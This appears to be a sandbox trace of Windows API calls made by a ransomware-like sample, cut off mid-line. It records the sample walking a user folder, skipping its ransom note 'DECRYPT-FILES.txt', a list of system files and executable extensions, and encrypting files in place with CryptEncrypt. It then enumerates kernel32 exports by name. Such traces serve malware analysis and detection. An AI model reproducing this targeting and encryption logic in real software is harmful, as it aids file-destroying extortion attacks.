FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xf0282780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0282780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0183.685] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0183.685] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xf0282780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0282780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.685] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0183.685] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0183.685] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf0282780, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf0282780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0282780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0183.685] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0183.685] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0183.685] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0183.685] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0183.685] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0183.685] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0183.685] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0183.685] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0183.685] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0183.685] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0183.685] lstrlenW (lpString="0a16c9.tmp") returned 10 [0183.685] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0183.685] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0183.685] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0183.685] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0183.685] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned 76 [0183.685] lstrlenW (lpString="0a16c9.tmp") returned 10 [0183.685] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\" [0183.685] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\0a16c9.tmp" [0183.685] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0183.686] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0183.686] CloseHandle (hObject=0x0) returned 0 [0183.686] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.686] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac3706e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac3706e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3706e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0183.686] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0183.686] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xac396840, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x112, dwReserved0=0x0, dwReserved1=0x0, cFileName="InstallTime20131025151332.XEV9dX", cAlternateFileName="INSTAL~1.XEV")) returned 1 [0183.686] lstrcmpiW (lpString1="InstallTime20131025151332.XEV9dX", lpString2="DECRYPT-FILES.txt") returned 1 [0183.686] lstrcmpiW (lpString1="InstallTime20131025151332.XEV9dX", lpString2="autorun.inf") returned 1 [0183.686] lstrcmpiW (lpString1="InstallTime20131025151332.XEV9dX", lpString2="boot.ini") returned 1 [0183.686] lstrcmpiW (lpString1="InstallTime20131025151332.XEV9dX", lpString2="desktop.ini") returned 1 [0183.686] lstrcmpiW (lpString1="InstallTime20131025151332.XEV9dX", lpString2="ntuser.dat") returned -1 [0183.686] lstrcmpiW (lpString1="InstallTime20131025151332.XEV9dX", lpString2="iconcache.db") returned 1 [0183.686] lstrcmpiW (lpString1="InstallTime20131025151332.XEV9dX", lpString2="bootsect.bak") returned 1 [0183.686] lstrcmpiW (lpString1="InstallTime20131025151332.XEV9dX", lpString2="ntuser.dat.log") returned -1 [0183.687] lstrcmpiW (lpString1="InstallTime20131025151332.XEV9dX", lpString2="thumbs.db") returned -1 [0183.687] lstrcmpiW (lpString1="InstallTime20131025151332.XEV9dX", lpString2="Bootfont.bin") returned 1 [0183.687] lstrlenW (lpString="InstallTime20131025151332.XEV9dX") returned 32 [0183.687] lstrcmpiW (lpString1="XEV9dX", lpString2="lnk") returned 1 [0183.687] lstrcmpiW (lpString1="XEV9dX", lpString2="exe") returned 1 [0183.687] lstrcmpiW (lpString1="XEV9dX", lpString2="sys") returned 1 [0183.687] lstrcmpiW (lpString1="XEV9dX", lpString2="dll") returned 1 [0183.687] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned 76 [0183.687] lstrlenW (lpString="InstallTime20131025151332.XEV9dX") returned 32 [0183.687] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\" [0183.687] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpString2="InstallTime20131025151332.XEV9dX" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332.XEV9dX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332.XEV9dX" [0183.687] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0183.687] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332.XEV9dX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332.xev9dx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0183.687] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=274) returned 1 [0183.687] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0183.688] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0183.688] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0183.688] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0183.688] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0183.689] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x100) returned 1 [0183.689] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0183.689] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.689] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0183.690] CloseHandle (hObject=0x280) returned 1 [0183.690] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.690] WriteFile (in: hFile=0x27c, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fda38, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fda38*=0x108, lpOverlapped=0x0) returned 1 [0183.691] CloseHandle (hObject=0x0) returned 0 [0183.691] CloseHandle (hObject=0x27c) returned 1 [0183.691] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.691] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.691] GetTickCount () returned 0x11352c2 [0183.691] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0183.691] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0183.691] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0183.692] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0183.692] lstrlenA (lpString="kernel32.dll") returned 12 [0183.692] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0183.692] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0183.692] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0183.692] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0183.692] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0183.692] lstrcpyA (in: lpString1=0x36fce30, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0183.692] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0183.692] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0183.692] lstrlenA (lpString="ADDATOMA") returned 8 [0183.692] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0183.692] lstrlenA (lpString="ADDATOMW") returned 8 [0183.692] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0183.692] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0183.692] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0183.692] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0183.692] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0183.692] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0183.692] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0183.693] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0183.693] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0183.693] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0183.693] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0183.693] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0183.693] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0183.693] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0183.693] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0183.693] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0183.693] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0183.693] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0183.693] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0183.693] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0183.693] lstrcpyA (in: lpString1=0x36fce30, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0183.693] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0183.693] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0183.693] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0183.693] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0183.693] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0183.693] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0183.693] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0183.693] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0183.693] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0183.693] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0183.693] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0183.693] lstrcpyA (in: lpString1=0x36fce30, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0183.693] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0183.693] lstrcpyA (in: lpString1=0x36fce30, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0183.693] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0183.693] lstrcpyA (in: lpString1=0x36fce30, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0183.693] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0183.693] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0183.693] lstrlenA (lpString="BACKUPREAD") returned 10 [0183.693] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0183.693] lstrlenA (lpString="BACKUPSEEK") returned 10 [0183.693] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0183.694] lstrlenA (lpString="BACKUPWRITE") returned 11 [0183.694] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0183.694] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0183.694] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0183.694] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0183.694] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0183.694] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0183.694] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0183.694] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0183.694] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0183.694] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0183.694] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0183.694] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0183.694] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0183.694] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0183.694] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0183.694] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0183.694] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0183.694] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0183.694] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0183.694] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0183.694] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0183.694] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0183.694] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0183.694] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0183.694] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0183.694] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0183.694] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0183.694] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0183.694] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0183.694] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0183.694] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0183.694] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0183.694] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0183.694] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0183.694] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0183.694] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0183.695] lstrcpyA (in: lpString1=0x36fce30, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0183.695] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0183.695] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0183.695] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0183.695] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0183.695] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0183.695] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0183.695] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0183.695] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0183.695] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0183.695] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0183.695] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0183.695] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0183.695] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0183.695] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0183.695] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0183.695] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0183.695] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0183.695] lstrcpyA (in: lpString1=0x36fce30, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0183.695] lstrlenA (lpString="BEEP") returned 4 [0183.695] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0183.695] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0183.695] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0183.695] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0183.695] lstrcpyA (in: lpString1=0x36fce30, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0183.695] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0183.695] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0183.695] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0183.695] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0183.695] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0183.695] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0183.695] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0183.695] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0183.695] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0183.695] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0183.695] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0183.695] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0183.696] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0183.696] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0183.696] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0183.696] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0183.696] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0183.696] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0183.696] lstrlenA (lpString="CANCELIO") returned 8 [0183.696] lstrcpyA (in: lpString1=0x36fce30, 